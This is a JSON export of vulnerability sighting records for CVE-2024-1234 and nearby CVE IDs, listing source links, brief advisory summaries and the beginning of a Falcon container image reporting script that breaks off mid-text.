{"vulnerability": "CVE-2024-1234", "sightings": [{"uuid": "5acc0e3c-43ab-4e8d-92c9-d72b954b6432", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12348", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113620042594523349", "content": "", "creation_timestamp": "2024-12-09T00:31:03.719778Z"}, {"uuid": "4b656020-38aa-483e-afa6-960f5dc8542f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12343", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113616512565146996", "content": "", "creation_timestamp": "2024-12-08T09:33:20.092902Z"}, {"uuid": "6c7d6b30-dec4-48eb-aadb-bec6d2b14bef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12349", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113620042610266633", "content": "", "creation_timestamp": "2024-12-09T00:31:04.281123Z"}, {"uuid": "69522bed-d19c-4bfa-b262-12dae210f90e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12344", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113619720536909057", "content": "", "creation_timestamp": "2024-12-08T23:09:09.854534Z"}, {"uuid": "91c4c32a-2275-4fe2-ac0c-9a21d13bb98d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12346", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113619819168185275", "content": "", "creation_timestamp": "2024-12-08T23:34:14.459560Z"}, {"uuid": "2ccb330b-12df-4cb7-9162-ee6d845f163a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12347", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113619819183044274", "content": "", "creation_timestamp": "2024-12-08T23:34:15.226513Z"}, {"uuid": "795172cc-2273-4e78-961e-aa6193f0b9a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12341", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113637984688949211", "content": "", "creation_timestamp": "2024-12-12T04:33:58.816701Z"}, {"uuid": "e6d5f125-0b9f-4512-94ac-8098005c8c9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12340", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113673114767404104", "content": "", "creation_timestamp": "2024-12-18T09:28:00.916983Z"}, {"uuid": "90e113e7-11ea-49ce-af91-d47d908348d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://bsky.app/profile/barrymurrell.bsky.social/post/3leynxkqook2c", "content": "", "creation_timestamp": "2025-01-05T12:52:12.895757Z"}, {"uuid": "0974234c-d2e1-4d79-afaf-e8d372f8d55a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113899992485971241", "content": "", "creation_timestamp": "2025-01-27T11:06:00.055681Z"}, {"uuid": "28141cc4-dbfa-4ba3-ae18-ed727bd4145b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lgpstcow3g2t", "content": "", "creation_timestamp": "2025-01-27T11:15:45.199977Z"}, {"uuid": "b8bb9d26-25b3-4622-af78-a756e5b61717", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lgq73klgd52w", "content": "", "creation_timestamp": "2025-01-27T14:55:09.619467Z"}, {"uuid": "e772615a-6b29-4a8c-bf0c-5bde73e8e202", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://gist.github.com/ndouglas-cloudsmith/44943d8a7c6ed78006cf65ec5bb79d27", "content": "", "creation_timestamp": "2025-06-10T14:19:59.000000Z"}, {"uuid": "d098e843-e7f0-46b3-b46a-d869fccd9ad2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12342", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3ln4jem2w4m2u", "content": "", "creation_timestamp": "2025-04-18T21:02:14.204746Z"}, {"uuid": "ae677281-eb13-4c80-916c-2ad5f79dde88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12344", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3ln4jem6ejy2t", "content": "", "creation_timestamp": "2025-04-18T21:02:14.845305Z"}, {"uuid": "5a7b0e47-a998-48a4-8ad2-3f4ea3ce953f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://gist.github.com/ndouglas-cloudsmith/686c24676d9281ea13827f50230bb60b", "content": "", "creation_timestamp": "2025-06-17T11:41:04.000000Z"}, {"uuid": "8e4b6c87-3466-4a6e-a4c1-f5c26ea9e302", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3m2qxtbturk2f", "content": "", "creation_timestamp": "2025-10-09T10:41:48.215687Z"}, {"uuid": "c6c7ccec-7916-4562-92d0-32b73ccab0e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://gist.github.com/mytreya-rh/da4aef61a7ab8816fa11198f9b064846", "content": "", "creation_timestamp": "2025-11-13T12:36:23.000000Z"}, {"uuid": "8526fe66-7a1a-44e8-b658-8ba72db03172", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://gist.github.com/cd1zz/aa95fc8e06911decc6ab4a72f4c26c2f", "content": "", "creation_timestamp": "2025-09-11T14:10:40.000000Z"}, {"uuid": "b24284fd-36d3-48aa-8818-994fa8a15688", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://gist.github.com/Darkcrai86/fa0739ddcf27cecc82d4966f4e19ff1f", "content": "", "creation_timestamp": "2025-09-11T14:49:57.000000Z"}, {"uuid": "7bc416cb-ae0f-44f8-8b59-41594c537a76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://gist.github.com/mjervis-mo/a8bcddf5b94155ee1cdfc53b873a0408", "content": "", "creation_timestamp": "2025-09-09T09:41:23.000000Z"}, {"uuid": "1e8d2e6c-c379-43c2-ac62-f8f34dffd2f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://gist.github.com/semo970921/b7900f5845408aca8633df26a5a0059b", "content": "", "creation_timestamp": "2026-02-06T06:51:25.000000Z"}, {"uuid": "cfe61d7a-0a0a-4586-8524-6f32afab1898", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://gist.github.com/semo970921/b7900f5845408aca8633df26a5a0059b", "content": "", "creation_timestamp": "2026-02-06T06:51:25.000000Z"}, {"uuid": "a2fefa8d-9562-48a1-bca0-deebc6af98c9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mgi4fbshkx2m", "content": "", "creation_timestamp": "2026-03-07T15:11:47.833425Z"}, {"uuid": "8573a3b6-3690-440c-ad09-31f0f201adc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mggzy4feyt2d", "content": "", "creation_timestamp": "2026-03-07T04:55:57.851164Z"}, {"uuid": "e0b05d18-59e6-4ac0-97f9-cb0f6e28e706", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://gist.github.com/gal-dahan-wiz/a770c7ef4af0cfe9030251cd58d6bb23", "content": "", "creation_timestamp": "2026-03-06T12:29:52.000000Z"}, {"uuid": "79d48e79-edda-47ff-bef2-f9dea3f0de80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://gist.github.com/gal-dahan-wiz/13c8354a0ad368d7f2c33206cf8c925d", "content": "", "creation_timestamp": "2026-02-26T14:47:40.000000Z"}, {"uuid": "06d3fd42-ef6a-4732-96a8-616daf99fc4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mfdedpwzf52x", "content": "", "creation_timestamp": "2026-02-21T00:25:33.830547Z"}, {"uuid": "f157f036-4f9f-4a6c-9635-7f1f8fe0636a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://gist.github.com/ayoubzulfiqar/5b320151951fbdba0fb72a578f7b57ef", "content": "", "creation_timestamp": "2026-02-12T09:05:29.000000Z"}, {"uuid": "0932a0a9-98e7-4369-9ee7-1a7038d2425e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://gist.github.com/aurixai-solutions/313b026594574c70a22f8d72ef7c665b", "content": "", "creation_timestamp": "2026-02-21T06:48:02.000000Z"}, {"uuid": "cf4cc331-5846-4422-a446-68404d99302e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://gist.github.com/johnmillerATcodemag-com/6197fcf6c9000612e97935ad88d79021", "content": "", "creation_timestamp": "2025-12-30T16:44:44.000000Z"}, {"uuid": "51983c94-d93d-443c-a31e-c0092b361d72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mftp4jriqm2z", "content": "", "creation_timestamp": "2026-02-27T12:20:59.145215Z"}, {"uuid": "25407747-a01f-4ba2-b0ec-24353e581773", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mhfjovwlsf2q", "content": "", "creation_timestamp": "2026-03-19T07:57:00.613569Z"}, {"uuid": "eda01484-bb45-43a5-add2-18b8b669b958", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://gist.github.com/alon710/c4a18bfb1b633de803c3c0a7eb9a1a7e", "content": "", "creation_timestamp": "2026-01-24T22:44:25.000000Z"}, {"uuid": "092a1f8c-c71e-457e-a303-a09a119fbb74", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://gist.github.com/allan-gar2x/1de8a0db406b1b36cdc364fa96d2c93b", "content": "", "creation_timestamp": "2026-04-15T10:12:38.000000Z"}, {"uuid": "814aabd0-ed05-4ec6-a174-e4926acffa99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://gist.github.com/allan-gar2x/9fba3a5260416b87679023ab2384d446", "content": "", "creation_timestamp": "2026-04-15T10:38:50.000000Z"}, {"uuid": "36dc0abc-9a34-4ca4-955e-96a4cbe43567", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://bsky.app/profile/atomicedge.bsky.social/post/3mjnfn3w3d72u", "content": "", "creation_timestamp": "2026-04-16T21:56:11.069550Z"}, {"uuid": "63e2f20a-702d-4e3a-b8f3-14a78479989f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-1234", "type": "seen", "source": "https://gist.github.com/harche/ac8e8399a9bf69091a38a5cf6e3bc56b", "content": "", "creation_timestamp": "2026-04-28T22:02:22.000000Z"}, {"uuid": "0c3c38c9-f0d8-4351-bcc2-88f616021cc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12345", "type": "seen", "source": "https://t.me/cvedetector/16451", "content": "{\n \"Source\": \"CVE FEED\",\n \"Title\": \"CVE-2024-12345 - INW Krbyyyzo File Uploader DoS Vulnerability\", \n \"Content\": \"CVE ID : CVE-2024-12345 \nPublished : Jan. 27, 2025, 11:15 a.m. | 1\u00a0hour, 14\u00a0minutes ago \nDescription : A vulnerability classified as problematic was found in INW Krbyyyzo 25.2002. Affected by this vulnerability is an unknown functionality of the file /gbo.aspx of the component Daily Huddle Site. The manipulation of the argument s leads to resource consumption. It is possible to launch the attack on the local host. Other endpoints might be affected as well. \nSeverity: 4.4 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n \"Detection Date\": \"27 Jan 2025\",\n \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-01-27T14:19:26.000000Z"}, {"uuid": "0146e753-dfd1-4215-9eb7-65e6d0d7f3a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12349", "type": "seen", "source": "https://t.me/cvedetector/12338", "content": "{\n \"Source\": \"CVE FEED\",\n \"Title\": \"CVE-2024-12349 - JFinalCMS Cross-Site Request Forgery Vulnerability\", \n \"Content\": \"CVE ID : CVE-2024-12349 \nPublished : Dec. 9, 2024, 1:15 a.m. | 39\u00a0minutes ago \nDescription : A vulnerability was found in JFinalCMS 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/tag/save. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. \nSeverity: 4.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n \"Detection Date\": \"09 Dec 2024\",\n \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-09T02:59:06.000000Z"}, {"uuid": "1dbb1dd1-3f1b-46c4-b08b-b8cd536a5edd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12348", "type": "seen", "source": "https://t.me/cvedetector/12337", "content": "{\n \"Source\": \"CVE FEED\",\n \"Title\": \"CVE-2024-12348 - A vulnerability was found in Guizhou Xiaoma Techno\", \n \"Content\": \"CVE ID : CVE-2024-12348 \nPublished : Dec. 9, 2024, 1:15 a.m. | 39\u00a0minutes ago \nDescription : A vulnerability was found in Guizhou Xiaoma Technology jpress 5.1.2. It has been classified as problematic. Affected is the function AttachmentUtils.isUnSafe of the file /commons/attachment/upload of the component Attachment Upload Handler. The manipulation of the argument files[] leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. \nSeverity: 3.5 | LOW \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n \"Detection Date\": \"09 Dec 2024\",\n \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-09T02:59:05.000000Z"}, {"uuid": "da94c529-43ec-4346-ac91-08e338d3bee3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12346", "type": "seen", "source": "https://t.me/cvedetector/12336", "content": "{\n \"Source\": \"CVE FEED\",\n \"Title\": \"CVE-2024-12346 - Talentera Cross Site Scripting Vulnerability\", \n \"Content\": \"CVE ID : CVE-2024-12346 \nPublished : Dec. 9, 2024, 12:15 a.m. | 38\u00a0minutes ago \nDescription : A vulnerability has been found in Talentera up to 20241128 and classified as problematic. This vulnerability affects unknown code of the file /app/control/byt_cv_manager. The manipulation of the argument redirect_url leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The provided PoC only works in Mozilla Firefox. The vendor was contacted early about this disclosure but did not respond in any way. \nSeverity: 3.5 | LOW \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n \"Detection Date\": \"09 Dec 2024\",\n \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-09T02:09:02.000000Z"}, {"uuid": "0f72b4bf-9726-4726-bf71-db4f18c6344f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12347", "type": "seen", "source": "https://t.me/cvedetector/12335", "content": "{\n \"Source\": \"CVE FEED\",\n \"Title\": \"CVE-2024-12347 - \"Guangzhou Huayi Intelligent Technology Jeewms Druid Monitoring Interface Unauthorized Access Vulnerability\"\", \n \"Content\": \"CVE ID : CVE-2024-12347 \nPublished : Dec. 9, 2024, 12:15 a.m. | 38\u00a0minutes ago \nDescription : A vulnerability was found in Guangzhou Huayi Intelligent Technology Jeewms up to 1.0.0 and classified as critical. This issue affects some unknown processing of the file /jeewms_war/webpage/system/druid/index.html of the component Druid Monitoring Interface. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. \nSeverity: 5.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n \"Detection Date\": \"09 Dec 2024\",\n \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-09T02:08:58.000000Z"}, {"uuid": "a8c31263-a064-4bf2-ad5e-678532340b45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12344", "type": "seen", "source": "https://t.me/cvedetector/12334", "content": "{\n \"Source\": \"CVE FEED\",\n \"Title\": \"CVE-2024-12344 - TP-Link FTP USER Command Handler Remote Memory Corruption Vulnerability\", \n \"Content\": \"CVE ID : CVE-2024-12344 \nPublished : Dec. 8, 2024, 11:15 p.m. | 36\u00a0minutes ago \nDescription : A vulnerability, which was classified as critical, was found in TP-Link VN020 F3v(T) TT_V6.2.1021. This affects an unknown part of the component FTP USER Command Handler. The manipulation leads to memory corruption. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. \nSeverity: 6.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n \"Detection Date\": \"09 Dec 2024\",\n \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-09T01:18:40.000000Z"}, {"uuid": "4d28adeb-3259-422a-a721-7a34d71353fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12343", "type": "seen", "source": "https://t.me/cvedetector/12332", "content": "{\n \"Source\": \"CVE FEED\",\n \"Title\": \"CVE-2024-12343 - TP-Link SOAP Request Handler Buffer Overflow Vulnerability\", \n \"Content\": \"CVE ID : CVE-2024-12343 \nPublished : Dec. 8, 2024, 10:15 a.m. | 35\u00a0minutes ago \nDescription : A vulnerability classified as critical has been found in TP-Link VN020 F3v(T) TT_V6.2.1021. Affected is an unknown function of the file /control/WANIPConnection of the component SOAP Request Handler. The manipulation of the argument NewConnectionType leads to buffer overflow. The attack needs to be done within the local network. The exploit has been disclosed to the public and may be used. \nSeverity: 6.5 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n \"Detection Date\": \"08 Dec 2024\",\n \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-08T11:56:11.000000Z"}, {"uuid": "74a17fcd-adb5-4d04-8a9f-199fefb34414", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12342", "type": "seen", "source": "https://t.me/cvedetector/12331", "content": "{\n \"Source\": \"CVE FEED\",\n \"Title\": \"CVE-2024-12342 - \"TP-Link WANIPConnection Denial of Service Vulnerability\"\", \n \"Content\": \"CVE ID : CVE-2024-12342 \nPublished : Dec. 8, 2024, 7:15 a.m. | 42\u00a0minutes ago \nDescription : A vulnerability was found in TP-Link VN020 F3v(T) TT_V6.2.1021. It has been rated as critical. This issue affects some unknown processing of the file /control/WANIPConnection of the component Incomplete SOAP Request Handler. The manipulation leads to denial of service. The attack can only be initiated within the local network. The exploit has been disclosed to the public and may be used. \nSeverity: 6.5 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n \"Detection Date\": \"08 Dec 2024\",\n \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-08T09:25:40.000000Z"}, {"uuid": "04f90a54-8b57-47ce-9a32-5142b32aa34c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12341", "type": "seen", "source": "https://t.me/cvedetector/12688", "content": "{\n \"Source\": \"CVE FEED\",\n \"Title\": \"CVE-2024-12341 - WordPress Custom Skins Contact Form 7 Unauthenticated Data Tampering Vulnerability\", \n \"Content\": \"CVE ID : CVE-2024-12341 \nPublished : Dec. 12, 2024, 4:15 a.m. | 36\u00a0minutes ago \nDescription : The Custom Skins Contact Form 7 plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'cf7cs_action_callback' function in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the content of any post and create new skins. \nSeverity: 4.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n \"Detection Date\": \"12 Dec 2024\",\n \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-12T06:17:22.000000Z"}, {"uuid": "232b3895-caaa-4ebb-9ace-1f9a4153717d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12340", "type": "seen", "source": "https://t.me/cvedetector/13179", "content": "{\n \"Source\": \"CVE FEED\",\n \"Title\": \"CVE-2024-12340 - Elementor Animation Addons Sensitive Information Exposur\", \n \"Content\": \"CVE ID : CVE-2024-12340 \nPublished : Dec. 18, 2024, 10:15 a.m. | 42\u00a0minutes ago \nDescription : The Animation Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.6 via the 'render' function in widgets/content-slider.php and widgets/tabs.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft Elementor template data. \nSeverity: 4.3 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n \"Detection Date\": \"18 Dec 2024\",\n \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-12-18T12:01:14.000000Z"}, {"uuid": "7241b8b4-c894-4a7d-9405-608567533dd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://t.me/arpsyndicate/4213", "content": "#ExploitObserverAlert\n\nCVE-2024-1234\n\nDESCRIPTION: Exploit Observer has 7 entries in 2 file formats related to CVE-2024-1234. The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via data attribute in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.\n\nFIRST-EPSS: 0.000430000", "creation_timestamp": "2024-03-15T04:06:12.000000Z"}, {"uuid": "8963e65a-7d5d-408a-ad01-b3fd7d0c9b09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12342", "type": "published-proof-of-concept", "source": "Telegram/WaBw3Jw0vb5AGJc9tIYoYKjH3e2RrXYOROLA0rL6tF_sE5E", "content": "", "creation_timestamp": "2025-04-30T05:00:10.000000Z"}, {"uuid": "a13d81e6-4694-449d-8691-2f37b065927b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-12342", "type": "published-proof-of-concept", "source": "Telegram/oXbZUyDkh9HvYDCcVwESbtZAPUw4sF4JBZ0Dd5j_85BRE8U", "content": "", "creation_timestamp": "2025-04-30T05:00:07.000000Z"}, {"uuid": "70d3d0c4-5525-4767-a13a-1ba4466df3d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-1234", "type": "seen", "source": "https://gist.github.com/yannhowe/bc79334e9ba4f17106e2a63e09047707", "content": "#!/usr/bin/env python3\n\"\"\"\nFalcon Container Image Assessment Report\nExports ALL image fields to CSV - bypasses the 10-column UI limit.\n\nFixes:\n - UI only shows 10 vulnerability columns \u2192 exports all 25+ fields\n - Can't filter by last scanned date \u2192 use --last-scanned-after / --before\n - Missing fields (container_id, registry, tag, image_id) \u2192 all included\n - Build labels included in output (note: FQL filter not supported by API)\n\nUsage:\n # All images, full CSV\n python3 falcon-image-assessment-report.py\n\n # Filter by registry (Azure Container Registry)\n python3 falcon-image-assessment-report.py --registry myregistry.azurecr.io\n\n # Images with critical vulnerabilities\n python3 falcon-image-assessment-report.py --severity critical\n\n # Scanned in last 7 days\n python3 falcon-image-assessment-report.py --last-scanned-after 